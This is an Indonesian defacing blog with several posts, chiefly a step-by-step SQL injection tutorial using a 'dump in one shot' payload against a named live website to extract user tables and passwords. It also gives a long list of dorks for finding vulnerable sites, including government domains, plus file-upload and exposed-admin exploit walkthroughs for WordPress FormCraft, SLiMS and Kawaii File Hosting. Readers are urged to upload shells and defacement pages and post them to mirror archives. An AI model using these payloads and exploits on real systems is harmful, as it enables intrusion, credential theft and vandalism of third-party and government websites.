Home All Post

Cara Deface SQLi dengan Dios (Dump In One Shot)

      4 comments   

Ok, setelah saya memberikan daftar Dork Fresh SQLi 2019, sekarang giliran kita akan mempraktekannya.

Apa itu SQLi?
SQLi adalah singkatan dari Stuctured Query Language Injection. Kegiatan SQLi ini memungkinkan para attacker untuk melihat table dan database pada suatu website.

Kegiatan ini terbilang cukup mudah, karena cuma tempel tempel dios saja. Dios adalah Dump In One Shot. Dengan "dios" inilah kamu dapat melihat column dan tablenya.

Mumpung disini saya udah mendapatkan website vuln SQLi - nya, kita akan coba eksekusi.

Live Target = http://iagcc.com/news.php?id=58

Cara Deface SQLi dengan Dios (Dump In One Shot)
1. Oke, langkah pertama kalian dorking sendiri, dengan dork yang sudah saya berikan dipostingan sebelumnya atau dengan live target diatas.

2. Untuk Menentukan vuln atau tidaknya, cukup kamu beri string atau quote (')
Contoh : http://iagcc.com/news.php?id=58'

3. Jika vuln web yang tadi kamu beri string akan muncul kata kata "You Have error an SQL bla.. bla.. bla.." entah apalah itu saya tidak hafal h3h3 :v

4. Lanjut kita bermain order by sampai eror.
Contoh :
http://iagcc.com/news.php?id=58+order+by+1-- (Normal)
http://iagcc.com/news.php?id=58+order+by+2-- (Normal)
http://iagcc.com/news.php?id=58+order+by+3-- (Normal)
http://iagcc.com/news.php?id=58+order+by+4--(Normal)
http://iagcc.com/news.php?id=58+order+by+5-- (Normal)
http://iagcc.com/news.php?id=58+order+by+6-- (Normal)
http://iagcc.com/news.php?id=58+order+by+7-- (Error)

5. Karena errornya pada angka 7, maka columnya ada 6.

6. Sekarang kita kasih union select sesuai column
Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,4,5,6--
Jangan lupa beri tanda (-) sebelum parameter GET (liat sebelum angka 58)

7. Setelah itu akan muncul angka ajaibnya. Pada web tadi angka ajaibnya ada pada angka 4. Karena angka ajaib ada di angka 4, maka kita akan masukkan diosnya.
Dios :
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Contoh :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6--

8. Maka akan muncul semua column dan tablenya. Liat gambar :

9. Selanjutnya tinggal kita dump yang column nya yang sekiranya berbau admin,users,dll seperti gambar diatas yang saya beri tanda panah.

10. Jadi, ngedump username dan passwordnya seperti ini :
http://iagcc.com/news.php?id=-58+union+select+1,2,3,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,UserName,Password)),@),5,6--
11. Nah, sudah ketemu nih username dan passwordnya tinggal hash dan cari admin loginnya.
Gambar :

oke, demikian dulu pembahasan SQLi dengan dios. Semoga bermanfaat dan gunakan dengan bijak. Thank's.

Dork Fresh SQLi 2019

      4 comments   
Gambar Pemanis

Dork diperlukan sebagai senjata ampuh dalam kegiatan defacing. Tetapi banyak juga defacer yang mencari kelemahan website tanpa sebuah dork. Namun bagi kalian yang pemula, mencari kelemahan website tanpa sebuah dork akan menjadi hal susah.

Kali ini saya selaku admin Blog Kacang Canggih, akan membagikan beberapa daftar Dork SQLi Fresh 2019. Saya juga sudah dapat beberapa web vuln yang akan saya eksekusi sendiri. Yuk langsung aja kita kepembahasannya.

Note: Jangan bergantung pada dorknya, bergantunglah kepada otak kalian yang akan mengeksekusinya.

inurl:payment.php?card&id=
inurl:buy.php?view&id=
inurl:card.php?pid=
inurl:/module/News.php?cid=
inurl:index.php?id=
inurl:/banner.php?id= Cid
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurlinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurlp.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurlst.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:inions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:php?=id+gov
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:/product/brand_id=
inurl:/products/product.php?id=
inurl:/about.php?cid=
inurl:/feed_bunner?id=
inurl:/informasi_detail.php?id=
inurl:/author.php?id=
inurl:/post.php?id=
inurl:/Topic.php?id=
inurl:/categorias.php?id=
inurl:/show-post.php?id=
inurl:/news/post.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:news-full.php?id=
inurl:transcript.php?id=
inurl:readnews.php?id=
inurl:/manage-news.php?id=
inurl:/videos.php?id=
inurl:/Products.php?id= Site:in "delhi"
inurl:/post?id=published
inurl:/module/berita.php?id=
inurl:/hal=berita?id=
inurl:/Detil.php?id=
inurl:/prod.php?id=
inurl:/staff.php?id=
inurl/profile_view.php?id=
inurl:/s.php?id=
inurl:/interviews.php?do=view&id
inurl:/berita.php?id=4
inurl:?menu=02&id=14¬icia=
inurl:/view.php?id=
inurl:/media.php?module=detailproduk&id=
inurl:/module=detailproduk&id=
inurl:/content&author?id=
inurl:/articletext&asset=
inurl:/media&view=
inurl:/eventsandnews.php?id=
inurl:/full_content.php?article_id=
inurl:product_detail.php?id=
inurl:blog_post.php?id=
inurl:detail_berita.php?id=
inurl:tentang_kami.php?id=
inurl:hukum.php?id= site:go.id
inurl:kategori.php?id= site:go.id
inurl:berita.php?id= site:go.id
inurl:event.php?id= site:go.id
inurl:pengumuman.php?id= site:go.id
inurl:Category.php?id= site:us
inurl:shipped.php?id= site:us
site:us inurl:view cart.php?id=
site:us inurl:Smartphones.php?id=
site:us inurl:School.php?id=
inurl:/blog.php?id=
inurl:/main?module=home
inurl:/Catalog.aspx?id_group=
inurl:/about.php?id=
inurl:/Newsleter.php?id=
inurl:/stats.php?id=
inurl:/artikel.php?cat_id=
inurl:hal=detail_artikel.php?id
inurl:detail_berita.php?id= site:.com
inurl:product_detail.php?id=

Demikian beberapa daftar dork fresh SQLi hasil rangkuman saya. Semoga bermanfaat dan bijaklah dalam menggunakannya. Happy Defacing!

Situs Tempat Mirror Deface Terbaik

      5 comments   

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.

Tujuan defacer dalam melakukan kegiatan mendeface suatu website bermacam macam, seperti menyampaikan aspirasi kepada pemerintah, atau hanya sekedar mencari ketenaran dengan mencetak archive defacement pada suatu website archive mirror defacement.

Kali ini saya akan membahas situs/website tempat mirror deface yang cukup populer. Berikut ini perinciannya.

1. Zone-H.org

Zone-H adalah situs mirror deface yang sangat populer di kalangan para defacer global. Situs ini didirikan oleh Roberto Preatoni di Estonia pada tanggal 2 Maret 2002. Situs ini telah menyimpan hasil deface dari para defacer di seluruh dunia termasuk Indonesia.

2. HackersID.com

Situs tempat mirror ini didirikan pada tanggal 2 Agustus 2018. HackersID adalah situs tempat mirror hasil deface yang dibuat oleh orang Indonesia. Disinilah kebanyakan para defacer tanah air menyubmitkan hasil deface mereka.

3. Defacer.ID 

Defacer.ID adalah situs tempat mirror hasil deface yang tidak kala populer dari Zone-H.org dan HackersID.com. Situs ini juga dibuat oleh orang Indonesia. Kabarnya situs ini pernah dideface oleh defacer tanah air karena banyak fake defacement yang diarchivekan.

4. Zone-D.org 

Situs ini masih tergolong baru sejak artikel ini ditulis. Walaupun masih tergolong baru, tetapi sudah banyak defacer-defacer tanah air yang sudah menyubmitkan hasil deface mereka di situs ini.

Demikian artikel situs tempat mirror deface terbaik menurut KacangCanggih. Terima kasih telah mengunjungi blog KacangCanggih. Dan jangan lupa untuk terus mengunjungi blog kami untuk melihat artikel lainnya. 

WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Backdoor Access Vulnerability

      Comment   

[+] Exploit Title = WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Backdoor Access Vulnerability
[+] Author = KingSkrupellos
[+] Team = Cyberizm Digital Security Army
[+] Dork = inurl:/wp-content/plugins/formcraft/
[+] Exploit = http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php /wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] Only For File Types = txt, jpg, png.
[+] CSRF = touch me :*
[+] Tutorial =
Dorking dulu pake dork yang telah disediakan di atas, kembangin biar dapet yang fresh mirror :D
Jika sudah mendapat target, silahkan tambahkan exploit seperti yang di atas.
Ciri-ciri vuln muncul tulisan {"failed":"No file found 2"}. Contohnya seperti gambar di bawah ini.

Masukkan web vuln tersebut ke dalam CSRF Online yang telah disediakan.
Isi kolom pertama dengan target web vuln tersebut.
Isi kolom kedua dengan postfile files[] atau kalian bisa lihat gambar dibawah ini.

Kemudian klik "Titeni Target".
Setelah itu, pilih file ext txt, jpg, png.
Gimana cara akses filenya gan? Nanti akan muncul sendiri setelah mengupload file kalian, seperti gambar di bawah ini.
[+] Thanks to = All Member Banyumas Cyber Team ^_^

Deface Poc Admin Access Broken

      Comment   

[+] Exploit Title = Admin Access Broken
[+] Author = BlackWolfSec
[+] Dork =

  • inurl:/admin/dashboard.php site:in
  • inurl:/dashboard.php site:in
  • inurl:/admin/upload.php
  • Kembangkan ya gan ^_^
[+] Vuln = Langsung ke dashboard admin 
[+] Tutorial =
  • Pilih salah satu dork yang telah saya sediakan diatas atau kalian kembangin biar dapat yang fresh miror.
  • Pilih salah satu website yang kira kira vuln. Ciri ciri vuln yaitu langsung ke dashboard admin. Seperti contoh di bawah ini. 

  • Kalian bisa upload shell backdoor, script deface, atau bisa di JS OVERLAY. 
  • Silahkan mencoba :D

#SalamHeker

Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

      Comment   

[+] Author = KingSkrupellos
[+] From = Cyberizm Digital Security Team
[+] Dork =

  • Powered by SLiMS
  • Powered by SLiMS site:id
  • Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog
  • Senayan | Open Source Library Management System :: OPAC 
  • intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009
[+] Exploit = /admin/modules/bibliography/pop_attach.php
[+] Vuln = Muncul Form untuk upload script. 
[+] Only For File Types = txt, gif, jpg, png, jpeg, dan lain lain. 
[+] Tutorial = 
  • Pilih salah satu dork yang telah disediakan di atas atau kalian bisa mengembangkannya sendiri. 
  • Pilih salah satu website yang kira-kira vuln. 
  • Lalu tambahkan exploit seperti yang telah saya sediakan di atas. Perhatikan gambar dibawah ini untuk lebih jelas lagi. 

  • Upload file berekstensi txt, gif, jpg, png, dan lain sebagainya. 
  • Gimana cara akses filenya gan? Akses filenya biasanya di http://site.com/[path]/repository/filekalian. 

Oke itu dia tutorial dari saya semoga bermanfaat, jangan lupa dishare ya. 

#SalamHeker 

Deface Poc Kawaii File Hosting

      Comment   

[+] Dork =
  • Kawaii File Hosting 
  • Kawaii File Host 
  • Powered By Kawaii File Hosting 
  • Kembangkan biar dapat yang fresh (use your brain)
[+] Live Target = https://bakka.moe/
[+] Only For Filetype = html, txt, jpg, png, dan lainnya. 
[+] Tutorial = 
  • Silahkan kalian dorking dork seperti yang telah saya berikan diatas, selebihnya jika kalian ingin web yang masih fresh hackersid, zone-h, dll silahkan kalian kembangkan dork tersebut. 
  • Pilih salah satu web atau kalian gunakan live target diatas sebagai pembelajaran.
  • Klik tulisan "select or drop file(s)" atau klik "pilih file".
  • Upload file script kalian dalam bentuk yang telah saya jelaskan diatas, atau kalian bisa lihat gambar di bawah ini. 

  • Setelah diupload nanti kalian ditunjukkan link hasil upload script kalian. Untuk lebih jelasnya, kalian bisa lihat gambar di bawah ini. 

  • Selesai, Good Luck Sir. Tinggal kalian mirorin di defacer.id / hackersid.com / zone-h.org :v

#SalamHeker